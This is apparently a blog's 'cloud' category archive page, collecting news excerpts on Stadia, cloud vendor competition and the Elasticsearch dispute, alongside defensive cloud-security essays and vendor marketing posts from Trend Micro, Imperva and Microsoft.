Category Archives: cloud

Streaming and Cloud Computing Endanger Modding and Game Preservation

Services like Google's Stadia seem convenient, but they could completely change the past and future of video games, writes Rich Whitehouse, a video game preservationist and veteran programmer in the video game industry. From the story: For most of today's games, modding isn't an especially friendly process. There are some exceptions, but for the most part, people like me are digging into these games and reverse engineering data formats in order to create tools which allow users to mod the games. Once that data starts only existing on a server somewhere, we can no longer see it, and we can no longer change it. I expect some publishers/developers to respond to this by explicitly supporting modifications in their games, but ultimately, this will come with limitations and, most likely, censorship. As such, this represents an end of an era, where we're free to dig into these games and make whatever we want out of them. As someone who got their start in game development through modding, I think this sucks. It is also arguably not a healthy direction for the video game industry to head in. Dota 2, Counter-Strike, and other massively popular games that generate millions of dollars annually, all got their start as user-modifications of existing video games from big publishers. Will we still get the new Counter-Strike if users can't mod their games? [...] The bigger problem here, as I see it, is analysis and preservation. There is so much more history to a video game than the playable end result conveys. When the data and code driving a game exists only on a remote server, we can't look at it, and we can't learn from it. Reverse engineering a game gives us tons of insight into its development, from lost and hidden features to actual development decisions. Indeed, even with optimizing compilers and well-defined dependency trees which help to cull unused data out of retail builds, many of the popular major releases of today have plenty waiting to be discovered and documented. We're already living in a world where the story of a game's development remains largely hidden from the public, and the bits that trickle out through presentations and conferences are well-filtered, and often omit important information merely because it might not be well-received, might make the developer look bad, etc. This ultimately offers up a deeply flawed, relatively sparse historical record.

Read more of this story at Slashdot.

Is the Private or Public Cloud Right for Your Business?

It wasn’t a very long time ago when cloud computing was a niche field that only the most advanced organizations were dabbling with. Now the cloud is very much the mainstream, and it is rare to find a business that uses IT that doesn’t rely on it for a part of their infrastructure. But if […]… Read More

The post Is the Private or Public Cloud Right for Your Business? appeared first on The State of Security.

Why Google Stadia Will Be a Major Problem For Many American Players

Earlier today, Google launched its long-awaited "Stadia" cloud gaming service at the Game Developers Conference in San Francisco. Unlike services from Xbox, PlayStation, and Nintendo, Stadia is powered by Google's worldwide data centers, allowing users to play games across a variety of platforms -- browsers, computers, TVs, and mobile devices -- all via the internet at a 4K resolution. One major problem with Stadia, which Google didn't mention in its presentation, is that it will require a ton of bandwidth, testing the limits of data caps that most U.S. internet service providers have. "Most US ISPs cap their customers' bandwidth usage, usually somewhere in the neighborhood of 300 GB per month. And streaming 4K content eats up about 7GB an hour," Steve Bowling from YouTube gaming channel GameXplain tweeted. "And that's based on Netflix's publicly available guidelines for 4K video content, which is shot at 24 fps, a far cry from 60fps, meaning content at 4k60 could be more costly." He added: "Your average consumer likely isn't rocking a 100Mbps+ connection, and in some parts of America such options aren't even available, limiting Stadia's potential reach. And if you are, that cap can come at you fast, especially considering most folks are going to use their internet for more than just streaming games. Most ISPs offer additional data at a premium, but how many are going to want to pay that premium to stream 4K games?" What's unknown is whether or not Google will work with ISPs to help alleviate this concern. PCWord also notes that there's no option to download and install a game if you want, which is an option available on Steam's streaming service. "You're always streaming it, and presumably copies sold through the Google Play store won't come with more traditional versions from other storefronts," reports PCWorld. "You're either all-in on Stadia and streaming or you're not." UPDATE: A Google spokesperson told Kotaku they were able to deliver 1080p, 60 FPS gameplay for users with 25 Mbps connections. They also said that they expect Stadia to deliver 4K, 60 FPS for people with "approximately the same bandwidth requirements." How exactly they will achieve this is still unclear.

Read more of this story at Slashdot.

How to manage the double-edged sword of the cloud

The digital transformation that’s sweeping across many different industries is one that requires rich and quick data to enable organisations and businesses. The critical need to embrace digital transformation is

The post How to manage the double-edged sword of the cloud appeared first on The Cyber Security Place.

Some Companies Choose Microsoft’s Cloud Service Because They’re Afraid of Amazon

"In the cloud wars, Microsoft has been able to win big business from retailers, largely because companies like Walmart, Kroger, Gap and Target are opting not to write big checks to rival Amazon," reports CNBC: The more Amazon grows, the more that calculation could start working its way into other industries -- like automotive. In a recent interview with CNBC, Volkswagen's Heiko Huttel, who runs the company's connected car division, said the carmaker chose Microsoft Azure late last year for its "Automotive Cloud" project after considering Amazon Web Services... "If I take a look at all the competitors out there, you see they have capabilities in disrupting you at the customer interface," Hüttel said. "Then you have to carefully choose who is really getting down into the car, where you open up a lot of data to these people, and then you have to carefully choose with whom you are doing business." Microsoft likes to tout the merits of its cloud technology, but the company is fully aware that taking on AWS, which has a commanding lead in the cloud infrastructure market, isn't just about offering the best services... Microsoft doesn't break out Azure revenue, but analysts at Morgan Stanley estimate that it accounted for almost 10 percent of sales in the latest quarter.

Read more of this story at Slashdot.

Is Amazon’s AWS Approaching ‘War’ for Control of Elasticsearch?

Long-time Slashdot reader jasenj1 and Striek both shared news of a growing open source controversy. "Amazon Web Services on Monday announced that it's partnering with Netflix and Expedia to champion a new Open Distro for Elasticsearch due to concerns of proprietary code being mixed into the open source Elasticsearch project," reports Datanami. "Elastic, the company behind Elasticsearch, responded by accusing Amazon of copying code, inserting bugs into the community code, and engaging with the company under false pretenses..." In a blog post, Adrian Cockcroft, the vice president of cloud architecture strategy for AWS, says the new project is a "value added" distribution that's 100% open source, and that developers working on it will contribute any improvements or fixes back to the upstream Elasticsearch project. "The new advanced features of Open Distro for Elasticsearch are all Apache 2.0 licensed," Cockroft writes. "With the first release, our goal is to address many critical features missing from open source Elasticsearch, such as security, event monitoring and alerting, and SQL support...." Cockroft says there's no clear documentation in the Elasticsearch release notes over what's open source and what's proprietary. "Enterprise developers may inadvertently apply a fix or enhancement to the proprietary source code," he wrote. "This is hard to track and govern, could lead to breach of license, and could lead to immediate termination of rights (for both proprietary free and paid)." Elastic CEO Shay Banon responded Tuesday to AWS in a blog post, in which he leveled a variety of accusations at the cloud giant. "Our products were forked, redistributed and rebundled so many times I lost count," Banon wrote. "There was always a 'reason' [for the forks, redistributions, and rebundling], at times masked with fake altruism or benevolence. None of these have lasted. They were built to serve their own needs, drive confusion, and splinter the community." Elastic's commercial code may have provided an "inspiration" for others to follow, Banon wrote, but that inspiration didn't necessarily make for clean code. "It has been bluntly copied by various companies and even found its way back to certain distributions or forks, like the freshly minted Amazon one, sadly, painfully, with critical bugs," he wrote.

Read more of this story at Slashdot.

Are Shadow Cloud Services Undermining Your Security Efforts?

The Great Cloud Migration continues around the world, forging new pathways to digital transformation by way of data analytics, on-demand computing power, and agile scalability. If you’ve undertaken this journey,

The post Are Shadow Cloud Services Undermining Your Security Efforts? appeared first on The Cyber Security Place.

Moving from traditional on-premise solutions to cloud-based security

In this Help Net Security podcast recorded at RSA Conference 2019, Gary Marsden, Senior Director, Data Protection Services at Gemalto, talks about the feedback they’re getting from the market and how Gemalto

The post Moving from traditional on-premise solutions to cloud-based security appeared first on The Cyber Security Place.

Thoughts on Cloud Security

Recently I've been reading about cloud security and security with respect to DevOps. I'll say more about the excellent book I'm reading, but I had a moment of déjà vu during one section.

The book described how cloud security is a big change from enterprise security because it relies less on IP-address-centric controls and more on users and groups. The book talked about creating security groups, and adding users to those groups in order to control their access and capabilities.

As I read that passage, it reminded me of a time long ago, in the late 1990s, when I was studying for the MCSE, then called the Microsoft Certified Systems Engineer. I read the book at left, Windows NT Security Handbook, published in 1996 by Tom Sheldon. It described the exact same security process of creating security groups and adding users. This was core to the new NT 4 role based access control (RBAC) implementation.

Now, fast forward a few years, or all the way to today, and consider the security challenges facing the majority of legacy enterprises: securing Windows assets and the data they store and access. How could this wonderful security model, based on decades of experience (from the 1960s and 1970s no less), have failed to work in operational environments?

There are many reasons one could cite, but I think the following are at least worthy of mention.

The systems enforcing the security model are exposed to intruders.

Furthermore:

Intruders are generally able to gain code execution on systems participating in the security model.

Finally:

Intruders have access to the network traffic which partially contains elements of the security model.

From these weaknesses, a large portion of the security countermeasures of the last two decades have been derived as compensating controls and visibility requirements.

The question then becomes:

Does this change with the cloud?

In brief, I believe the answer is largely "yes," thankfully. Generally, the systems upon which the security model is being enforced are not able to access the enforcement mechanism, thanks to the wonders of virtualization.

Should an intruder find a way to escape from their restricted cloud platform and gain hypervisor or management network access, then they find themselves in a situation similar to the average Windows domain network.

This realization puts a heavy burden on the cloud infrastructure operators. They major players are likely able to acquire and apply the expertise and resources to make their infrastructure far more resilient and survivable than their enterprise counterparts.

The weakness will likely be their personnel.

Once the compute and network components are sufficiently robust from externally sourced compromise, then internal threats become the next most cost-effective and return-producing vectors for dedicated intruders.

Is there anything users can do as they hand their compute and data assets to cloud operators?

I suggest four moves.

First, small- to mid-sized cloud infrastructure users will likely have to piggyback or free-ride on the initiatives and influence of the largest cloud customers, who have the clout and hopefully the expertise to hold the cloud operators responsible for the security of everyone's data.

Second, lawmakers may also need improved whistleblower protection for cloud employees who feel threatened by revealing material weaknesses they encounter while doing their jobs.

Third, government regulators will have to ensure no cloud provider assumes a monopoly, or no two providers assume a duopoloy. We may end up with the three major players and a smattering of smaller ones, as is the case with many mature industries.

Fourth, users should use every means at their disposal to select cloud operators not only on their compute features, but on their security and visibility features. The more logging and visibility exposed by the cloud provider, the better. I am excited by new features like the Azure network tap and hope to see equivalent features in other cloud infrastructure.

Remember that security has two main functions: planning/resistance, to try to stop bad things from happening, and detection/respond, to handle the failures that inevitably happen. "Prevention eventually fails" is one of my long-time mantras. We don't want prevention to fail silently in the cloud. We need ways to know that failure is happening so that we can plan and implement new resistance mechanisms, and then validate their effectiveness via detection and response.

Update: I forgot to mention that the material above assumed that the cloud users and operators made no unintentional configuration mistakes. If users or operators introduce exposures or vulnerabilities, then those will be the weaknesses that intruders exploit. We've already seen a lot of this happening and it appears to be the most common problem. Procedures and tools which constantly assess cloud configurations for exposures and vulnerabilities due to misconfiguration or poor practices are a fifth move which all involved should make.

A corollary is that complexity can drive problems. When the cloud infrastructure offers too many knobs to turn, then it's likely the users and operators will believe they are taking one action when in reality they are implementing another.

Why You Need to Align Your Cloud Strategy to Your Business Goals

Your company has decided to adopt the Cloud – or maybe it was among the first ones that decided to rely on virtualized environments before it was even a thing. In either case, cloud security has to be managed. How do you go about that? Before checking out vendor marketing materials in search of the […]… Read More

The post Why You Need to Align Your Cloud Strategy to Your Business Goals appeared first on The State of Security.

Security Considerations for Whatever Cloud Service Model You Adopt

Companies recognize the strategic importance of adopting a cloud service model to transform their operations, but there still needs to be a focus on mitigating potential information risks with appropriate cloud security considerations, controls and requirements without compromising functionality, ease of use or the pace of adoption. We all worry about security in our business and personal lives, so it’s naturally a persistent concern when adopting cloud-based services — and understandably so. However, research suggests that cloud services are now a mainstream way of delivering IT requirements for many companies today and will continue to grow in spite of any unease about security.

According to Gartner, 28 percent of spending within key enterprise IT markets will shift to the cloud by 2022, which is up from 19 percent in 2018. Meanwhile, Forrester reported that cloud platforms and applications now drive the full spectrum of end-to-end business technology transformations in leading enterprises, from the key systems powering the back office to mobile apps delivering new customer experiences. More enterprises are using multiple cloud services each year, including software-as-a-service (SaaS) business apps and cloud platforms such as infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS), both on-premises and from public service providers.

What Is Your Cloud Security Readiness Posture?

The state of security readiness for cloud service adoption varies between companies, but many still lack the oversight and decision-making processes necessary for such a migration. There is a greater need for alignment and governance processes to manage and oversee a cloud vendor relationship. This represents a shift in responsibilities, so companies need to adequately staff, manage and maintain the appropriate level of oversight and control over the cloud service. As a result, a security governance and management model is essential for cloud services that can be found in a cloud vendor risk management program.

A cloud vendor risk management program requires careful consideration and implementation, but not a complete overhaul of your company’s entire cybersecurity program. The activities in the cloud vendor risk management program are intended to assist companies in approaching security in a consistent manner, regardless of how varied or unique the cloud service may be. The use of standard methods helps ensure there is reliable information on which to base decisions and actions. It also reinforces the ability to proactively evaluate and mitigate the risks cloud vendors introduce to the business. Finally, standard cloud vendor risk management methods can help distinguish between different types of risks and manage them appropriately.

Overlooked Security Considerations for Your Cloud Service Model

A cloud vendor risk management program provides a tailored set of security considerations, controls and requirements within a cloud computing environment through a phased life cycle approach. Determining cloud security considerations, controls and requirements is an ongoing analytical activity to evaluate the cloud service models and potential cloud vendors that can satisfy existing or emerging business needs.

All cloud security controls and requirements possess a certain level of importance based on risk, and most are applicable regardless of the cloud service. However, some elements are overlooked more often than others, and companies should pay particular attention to the following considerations to protect their cloud service model and the data therein.

Application Security

  • Application exposure: Consider the cloud vendor application’s overall attack surface. In a SaaS cloud environment, the applications offered by the cloud vendor often have broader exposure, which increases the attack surface. Additionally, those applications often still need to integrate back to other noncloud applications within the boundaries of your company or the cloud vendor enterprise.
  • Application mapping: Ensure that applications are aligned with the capabilities provided by cloud vendors to avoid the introduction of any undesirable features or vulnerabilities.
  • Application design: Pay close attention to the design and requirements of an application candidate and request a test period from the cloud vendor to rule out any possible issues. Require continuous communication and notification of major changes to ensure that compatibility testing is included in the change plans. SaaS cloud vendors will typically introduce additional features to improve the resilience of their software, such as security testing or strict versioning. Cloud vendors can also inform your company about the exact state of its business applications, such as specific software logging and monitoring, given their dedicated attention to managing reputation risk and reliance on providing secure software services and capabilities.
  • Browser vulnerabilities: Harden web browsers and browser clients. Applications offered by SaaS cloud vendors are accessible via secure communication through a web browser, which is a common target for malware and attacks.
  • Service-oriented architecture (SOA): Conduct ongoing assessments to continuously identify any application vulnerabilities, because the SOA libraries are maintained by the cloud vendor and not completely visible to your company. By using the vendor-provided SOA library, you can develop and test applications more quickly because SOA provides a common framework for application development.

Data Governance

  • Data ownership: Clearly define data ownership so the cloud vendor cannot refuse access to data or demand fees to return the data once the service contracts are terminated. SaaS cloud vendors will provide the applications and your company will provide the data.
  • Data disposal: Consider the options for safe disposal or destruction of any previous backups. Proper disposal of data is imperative to prevent unauthorized disclosure. Replace, recycle or upgrade disks with proper sanitization so that the information no longer remains within storage and cannot be retrieved. Ensure that the cloud vendor takes appropriate measures to prevent information assets from being sent without approval to countries where the data can be disclosed legally.
  • Data disposal upon contract termination: Implement processes to erase, sanitize and/or dispose of data migrated into the cloud vendor’s application prior to a contract termination. Ensure the details of applications are not disclosed without your company’s authorization.
  • Data encryption transmission requirements: Provide encryption of confidential data communicated between a user’s browser and a web-based application using secure protocols. Implement encryption of confidential data transmitted between an application server and a database to prevent unauthorized interception. Such encryption capabilities are generally provided as part of, or an option to, the database server software. You can achieve encryption of confidential file transfers through protocols such as Secure FTP (SFTP) or by encrypting the data prior to transmission.

Contract Management

  • Transborder legal requirements: Validate whether government entities in the hosting country require access to your company’s information, with or without proper notification. Implement necessary compliance controls and do not violate regulations in other countries when storing or transmitting data within the cloud vendor’s infrastructure. Different countries have different legal requirements, especially concerning personally identifiable information (PII).
  • Multitenancy: Segment and protect all resources allocated to a particular tenant to avoid disclosure of information to other tenants. For example, when a customer no longer needs allocated storage, it may be freely reallocated to another customer. In this case, wipe data thoroughly.
  • Network management: Determine network management roles and responsibilities with the cloud vendor. Within a SaaS implementation, the cloud vendor is entirely responsible for the network. In other models, the responsibility of the network is generally shared, but there will be exceptions.
  • Reliability: Ensure the cloud vendor has service-level agreements that specify the amount of allowable downtime and the time it will take to restore service in the event of an unexpected disruption.
  • Exit strategy: Develop an exit strategy for the eventual transition away from the cloud vendor considering tools, procedures and other offerings to securely facilitate data or service portability from the cloud vendor to another or bring services back in-house.

IT Asset Governance

  • Patch management: Determine the patch management processes with the cloud vendor and ensure there is ongoing awareness and reporting. Cloud vendors can introduce patches in their applications quickly without the approval or knowledge of your company because it can take a long time for a cloud vendor to get formal approval from every customer. This can result in your company having little control or insight regarding the patch management process and lead to unexpected side effects. Ensure that the cloud vendor hypervisor manager allows the necessary patches to be applied across the infrastructure in a short time, reducing the time available for a new vulnerability to be exploited.
  • Virtual machine security maintenance: Partner with cloud vendors that allow your company to create virtual machines (VM) in various states such as active, running, suspended and off. Although cloud vendors could be involved, the maintenance of security updates may be the responsibility of your company. Assess all inactive VMs and apply security patches to reduce the potential for out-of-date VMs to become compromised when activated.

Accelerate Your Cloud Transformation

Adopting cloud services can be a key steppingstone toward achieving your business objectives. Many companies have gained substantial value from cloud services, but there is still work to be done. Even successful companies often have cloud security gaps, including issues related to cloud security governance and management. Although it may not be easy, it’s critical to perform due diligence to address any gaps through a cloud vendor risk management program.

Cloud service security levels will vary, and security concerns will always be a part of any company’s transition to the cloud. But implementing a cloud vendor risk management program can certainly put your company in a better position to address these concerns. The bottom line is that security is no longer an acceptable reason for refusing to adopt cloud services, and the days when your business can keep up without them are officially over.

The post Security Considerations for Whatever Cloud Service Model You Adopt appeared first on Security Intelligence.

Shifting Left Is a Lie… Sort of

It would be hard to be involved in technology in any way and not see the dramatic upward trend in DevOps adoption. In their January 2019 publication “Five Key Trends To Benchmark DevOps Progress,” Forrester research found that 56 percent of firms were ‘implementing, implemented or expanding’ DevOps. Further, 51 percent of adopters have embraced […]… Read More

The post Shifting Left Is a Lie… Sort of appeared first on The State of Security.

Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples

Since the release of “Trend Micro Cloud App Security 2017 Report” about a year ago, threats using email as the delivery vector have grown significantly. Business Email Compromise (BEC) scams have already caused USD $12.5 billion in global losses as of 2018 – a 136.4% increase from the $5.3 billion reported in 2017. The popularity of Office 365 has positioned itself as an attractive target for cybercriminals.

In January, 2019, the U.S. Secret Service issued a bulletin calling out phishing attacks that specifically target organizations using Office 365.

Trend Micro™ Cloud App Security™ is an API-based service protecting Microsoft® Office 365™ Exchange™ Online, OneDrive® for Business, and SharePoint® Online platforms. Using multiple advanced threat protection techniques, it acts as a second layer of protection after emails and files have passed through Office 365 scanning.

In 2018, Cloud App Security caught 8.9 million high-risk email threats missed by Office 365 security. Those threats include one million malware, 7.7 million phishing attempts, and 103,955 BEC attempts.  Each of the blocked threats represent potential attacks that could result in monetary and productivity losses. For example, the average cost per BEC incident is now USD $159,000. Blocking 103,000 BEC attacks means potentially saving our customers $16 billion!

No matter what Office 365 plan you use, or whether a third-party email gateway is deployed, customers still stop a significant number of potentially damaging threats with Trend Micro Cloud App Security.

Customer examples: Additional detections after Office 365 built-in security (2018 data)

For customers using Office 365 built-in security, they saw obvious value from deploying Trend Micro Cloud App Security. For example, an internet company with 10,000 Office 365 E3 users found an additional 16,000 malware, 232,000 malicious URLs, 174,000 phishing emails, and 2,000 BEC attacks in 2018.

Customer examples: Additional Detections after Office 365 Advanced Threat Protection (2018 data)

Customers using Office 365 Advanced Threat Protection (ATP) also need an additional layer of filtering as well. A logistics company with 80,000 users of E3 and ATP detected an additional 28,000 malware and 662,000 malicious URLs in 2018 with Trend Micro Cloud App Security.

Customer examples: Additional Detections after third-party email gateway and Office 365 built-in security (2018 data)

Many customers use a third-party email gateway to scan emails before they’re delivered to their Office 365 environment. Despite these gateway deployments, many of the sneakiest and hardest to detect threats still slipped though. Plus, a gateway solution can’t detect internal email threats, which can originate from compromised devices or accounts within Office 365.

For example, a business with 120,000 Office 365 users with a third-party email gateway stopped an additional 166,823 phishing emails, 237,222 malicious URLs, 78,246 known and unknown malware, and 1,645 BEC emails with Cloud App Security.

Innovative technologies to combat new email threats 

Continuous innovation is one key reason why Trend Micro is able to catch so many threats missed by Office 365 and/or third-party email gateways. In 2018, two new advanced features were introduced by Cloud App Security to help businesses stay protected from advanced email threats.

The first is Writing Style DNA, an artificial intelligence (AI)-powered technology that can help detect email impersonation tactics used in BEC scams. It uses AI to recognize a user’s writing style based on past emails and then compares it to suspected forgeries.

The second technology is a feature that combines AI and computer vision technology to help detect and block attempts at credential phishing in real time, especially now that more schemes use fake, legitimate-looking login webpages to deceive email users. A login page’s branded elements, login form, and other website components are checked by this tool to determine if a page is legitimate.

Additionally, Trend Micro uniquely offers a pre-execution machine learning engine to find unknown malware in addition to its award-winning Deep Discovery sandbox technology. The pre-execution machine learning engine provides better threat coverage while improving email delivery by finding threats before the sandbox layer.

Check out the Trend Micro Cloud App Security 2018 Report to get more details on the type of threats blocked by this product and common email attacks analyzed by Trend Micro Research in 2018.

The post Protecting against the next wave of advanced threats targeting Office 365 – Trend Micro Cloud App Security 2018 detection results and customer examples appeared first on .

Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise.

Is your enterprise in the midst of a digital transformation? Of course it is. Doing business in today’s global marketplace is more competitive than ever. Automating your business processes and infusing them with always-on, real-time applications and other cutting-edge technology is key to keeping your customers happy, attracting and retaining good workers, transacting with your partners, and growing your business.

A transformation this sweeping doesn’t happen overnight, though. Mission-critical applications and processes can’t be swapped for new ones without risk to your bottom line. While all enterprises are moving to hosted applications or virtualized software hosted on Infrastructure as a Service (IaaS) platforms such as AWS or Microsoft Azure, the reality is that it will take many years for them to become all cloud — if ever.

In other words, many,  if not most enterprises have a hybrid IT infrastructure. And that’s not going to change for many years.

In the meantime, you need security strong enough to protect your business and agile enough to cover your transforming infrastructure. That’s why Imperva has introduced a simpler way for organizations to deploy our family of security products and services, which we call FlexProtect. FlexProtect comes in three different plans: FlexProtect Pro, FlexProtect Plus, and FlexProtect Premier.

With the FlexProtect Plus and Premier plans, our analyst-recognized application and data security solutions protect your applications and data even as you migrate them from on-premises data centers to multiple cloud providers. Don’t let complicated, inflexible security licenses slow down your cloud migration. FlexProtect provides simple and predictable licensing that covers your entire IT infrastructure, even if you use multiple clouds for IaaS, and even as you move workloads between on-premises and clouds. With our powerful security analytics solutions available in all FlexProtect plans, you also have the visibility and control you need to help you manage your security wherever your assets are.

Imperva also offers a third option, FlexProtect Pro. This brings together five powerful SaaS-based Application Security capabilities to protect your edge from attack: Cloud WAF, Bot Protection, IP Reputation Intelligence, our Content Delivery Network (CDN) as well as our powerful Attack Analytics solution, which turns events into insights you can act on. FlexProtect Pro gives businesses simple application security delivered completely as a service.

Imperva is in the midst of its own transformation — learn more about the New Imperva here. That gives us keen insight into the challenges with which our customers are grappling. And that’s why we developed FlexProtect licensing, in order to better defend your business and its growth, wherever you are on your digital transformation journey. You’ll never have to choose between innovating for your customers and protecting what matters.

To learn more about FlexProtect, meet us at the RSA Conference March 4-8 in San Francisco. Stop by Booth 527 in the South Expo and hear directly from Imperva experts. You can also see a demo of our latest products in the areas of cloud app and data security and data risk analytics.

Imperva will also be at the AWS booth (1227 in the South Expo hall), where you’ll be able to hear how one of our cloud customers, an U.S.-based non-profit with nearly 40 million members, uses Imperva Autonomous Application Protection (AAP) to detect and mitigate potential application attacks, Tuesday, March 5th from 3:30 – 4:00 pm in the AWS booth. You can also see a demo of how our solutions work in cloud environments, Tuesday, March 5th 3:30-5 pm and Wednesday, March 6th, 11:30-2 pm.

Finally — I will be participating in the webinar “Cyber Security Battles: How to Prepare and Win” during RSA. It will be broadcast live at 9:30 am on March 6th and feature a Q&A discussion with several cybersecurity executives as they discuss the possibility of a cyber battle between AI systems, which some experts predict might be on the horizon in the next three to five years. Register and watch the live feed or recording for free!

The post Don’t Let Security Needs Halt Your Digital Transformation. Imperva FlexProtect Offers Agile Security for any Enterprise. appeared first on Blog.

Inspired and powered by partners

$32 billion in revenue. That’s an incredible number that Satya Nadella and Amy Hood shared during the Q2 earnings call last week. Just as impressive is the commercial cloud revenue increase of 48 percent year-over-year to $9 billion. Did you know that 95 percent of Microsoft’s commercial revenue flows directly through our partner ecosystem? With more than 7,500 partners joining that ecosystem every month, partner growth and partner innovation are directly fueling our commercial cloud growth. One accelerant, the IP co-sell program, now has thousands of co-sell ready partners that generated an incredible $8 billion in contracted partner revenue since the program began in July 2017.

It’s exciting to see the success of our partners, and to know we are collaborating with businesses of all types and sizes wherever there is opportunity. We’re working together with partners old and new to help them build their own digital capability to compete and grow. We’ve doubled down on our partnership with Accenture and Avanade, creating the new Accenture Microsoft Business Group to help customers overcome disruption and lead transformation in their industries. We’re partnering in new ways with customers like Kroger to bring their new Retail as a Service solution built on Azure, to use in their stores – and to sell to other retailers.

Part of Microsoft’s digital transformation is moving beyond transactional reselling via partners, to a true partnership philosophy where we’re working together to develop and sell each other’s technology and solutions. Our partners are building on our technology, collaborating with partners across borders to build repeatable solutions, and creating new revenue opportunities that didn’t exist in the past. We focus as much on selling third-party solutions as our own, and the speed of the cloud enables all of us to accelerate value to our customers.

I want to share more with you about how hundreds of thousands of Microsoft partners are powering customer innovation, and how we are evolving our partnership strategy in order to drive tech intensity for customers around the world.

Partner success and momentum

With hundreds of thousands of partners across the world, our partner ecosystem is stronger than ever.

CSP: Through our Cloud Solution Provider (CSP) program, our fastest-growing licensing model, partners are embedding Microsoft technologies into their own solutions and delivering more differentiated, long-term value for customers. The number of partners transacting through CSP is up 52 percent, and they are serving more than 2 million customers.

Azure Expert MSP: The Azure Expert MSP program has grown to 43 partners that deliver consistent, repeatable, high-fidelity managed services on Azure and are driving more than $100,000 per month in Azure consumption. A big part of this volume is in migration services, as SQL Server 2008 phases out this summer, followed by Windows Server 2008 a year from now. The opportunity for partners can’t be overstated. Our estimates put the opportunity around $50 billion for partners to help customers move their existing on-premises workloads to Azure and start capitalizing on the benefits of the cloud.

IP Co-Sell: Our industry-leading IP co-sell program that rewards Microsoft sellers for selling third-party solutions is a runaway success, generating $8 billion in contracted partner revenue since July. Our partners are reaping the benefits and seeing co-sell deals close nearly three times faster, projects that are nearly six times larger, and drive six times more Azure consumption.

Building the largest commercial marketplace

Gartner estimates the opportunity for business applications will be $133 billion this year, with independent software vendors (ISVs) driving more than half of that. So we are upping our commitment to ISVs by investing in Microsoft’s marketplaces, Azure Marketplace, and AppSource, to build the largest commercial marketplace in the industry. Our marketplace provides a frictionless selling and buying experience that brings parity to first and third-party solutions and meets the needs of both IP builders and software purchasers. Partners with solutions in our marketplace can sell directly to more than a billion customers and partners, and they benefit from lower deployment costs and flexible procurement models for software. Through the marketplace go-to-market services, we’ve seen partners achieve an average of 40 percent reduction in cost per lead, and a 2x lead conversion to sales rate compared to industry averages.

New capabilities are coming soon to AppSource and Azure Marketplace. One of the biggest developments is the ability for partners to offer their solutions to our partner ecosystem through the CSP program, with a single click. We’re also improving the user experience and interface with natural language and recommendations features. And by setting up private marketplaces, partners will be able to customize the terms for any specific customer—billing or metering their services on a per-user, per-app, per-month, or per-day basis to meet customer needs. And soon we’ll be offering curated portfolio IP & Services solutions that leverage Azure, Dynamics, Power BI, Power Apps, and Office.

AI for enterprise

IDC estimates that global spending on cognitive and artificial intelligence systems is expected to triple between 2018 to 2022, from $24 billion to $77.6 billion. And just like Microsoft transformed the way people work and live by making personal computing widely accessible in the 1980s and 1990s, we plan to do the same with artificial intelligence. Our aim is to make AI accessible to and valuable for everyone. We’ll do it by focusing on AI innovations that extend and empower human capabilities, while keeping people in control. Our partners are finding huge success and growth in the AI space. Through our AI Inner Circle Partner program, partners provide custom services and enhanced AI solutions to customers and have seen more than 200 percent growth in their AI practices year-over-year.

As we encourage partners to go all-in on AI, we need to make sure they have substantial resources and training. So, we’ve developed AI Practice Development Workshops, Advanced Education, trainings in the classroom, online, and at events. So far, since July, more than 29,000 people have been trained across Microsoft’s data and AI portfolios. Our popular AI Partner Development Playbook and library of online resources—collectively with more than 1 million downloads—have put answers at the fingertips of partners launching and expanding their AI services.

New HR skills playbook and tools

The latest in our series of Cloud Practice Development Playbooks, released today, is an outstanding human resources guide for partners and customers. We collected input from more than 700 partners to develop “Recruit, Hire, Onboard & Retain Talent.” It is a hands-on guide to walk partners through the HR process of recruiting, hiring, and onboarding employees. Alongside the playbook, we’re launching a new learning portal on MPN that simplifies partner training, and a new Partner Transformation Assessment Tool to help partners map resources and investments against solution areas and workloads.

Partner opportunities ahead

Microsoft’s mission is to empower every person and every organization on the planet to achieve more. And we know that partners make more possible. As a customer-first, partner-led company, we start with the needs of our customers and work with our partners to deliver the best outcomes for each organization. We look forward to continued evolution in the Microsoft-partner relationship this year—with more innovation in AI, more co-selling opportunities, and more ways to connect partners to customers and to other partners through Azure Marketplace and AppSource. I invite you to learn more about how Microsoft leaders from the Azure, Dynamics, and ISV teams are supporting our partners, and how partners can capitalize on the opportunities ahead.

 

 

 

 

The post Inspired and powered by partners appeared first on The Official Microsoft Blog.

From shopping to car design, our customers and partners spark innovation across every industry

Judson Althoff visits Kroger’s QFC store in Redmond, WA, one of two pilot locations featuring connected customer experiences powered by Microsoft Azure and AI. Also pictured, Wesley Rhodes, Vice President of Technology Transformation at Kroger.

Computing is embedded all around us. Devices are increasingly more connected, and the availability of data and information is greater now than it has ever been. To grow, compete and respond to customer demands, all companies are becoming digital. In this new reality, enterprise technology choices play an outsized role in how businesses operate, influencing how employees collaborate, how organizations ensure data security and privacy, and how they deliver compelling customer experiences.

This is what we mean when we talk about digital transformation. As our CEO Satya Nadella described it recently, it is how organizations with tech intensity adopt faster, best-in-class technology and simultaneously build their own unique digital capabilities. I see this trend in every industry where customers are choosing Microsoft’s intelligent cloud and intelligent edge to power their transformation.

Over just the past two months, customers as varied as Walmart, Gap Inc., Nielsen, Mastercard, BP, BlackRock, Fruit of the Loom and Brooks Running have shared how technology is reshaping all aspects of our lives — from the way we shop to how we manage money and save for retirement. At the Consumer Electronics Show (CES) earlier this month, Microsoft customers and partners highlighted how the Microsoft cloud, the Internet of Things (IoT) and artificial intelligence (AI) play an ever-expanding role in driving consumer experiences, from LGE’s autonomous vehicle and infotainment systems, to Visteon’s use of Azure to develop autonomous driving development environments, to ZF’s fleet management and predictive maintenance solutions. More recently, at the National Retail Federation (NRF) conference, Microsoft teamed up with retail industry leaders like Starbucks that are reimagining customer and employee experiences with technology.

In fact, there is no shortage of customer examples of tech intensity. They span all industries, including retail, healthcare, automotive manufacturing, maritime research, education and government. Here are just a few of my favorite examples:

Together with Microsoft, Kroger – America’s biggest supermarket chain – opened two pilot stores offering new connected experiences with Microsoft Azure and AI and announced a Retail as a Service (RaaS) solution on Azure. This partnership with Kroger resonates strongly with me because I first met with the company’s CEO in 2013 soon after joining Microsoft. Since then, I have witnessed the Kroger-Microsoft relationship grow and mature beyond measure. The pilot stores feature “digital shelves” which can show ads and change prices on the fly, along with a network of sensors that keep track of products and help speed shoppers through the aisles. Kroger may eventually roll out the Microsoft cloud-powered system in all its 2,780 supermarkets.

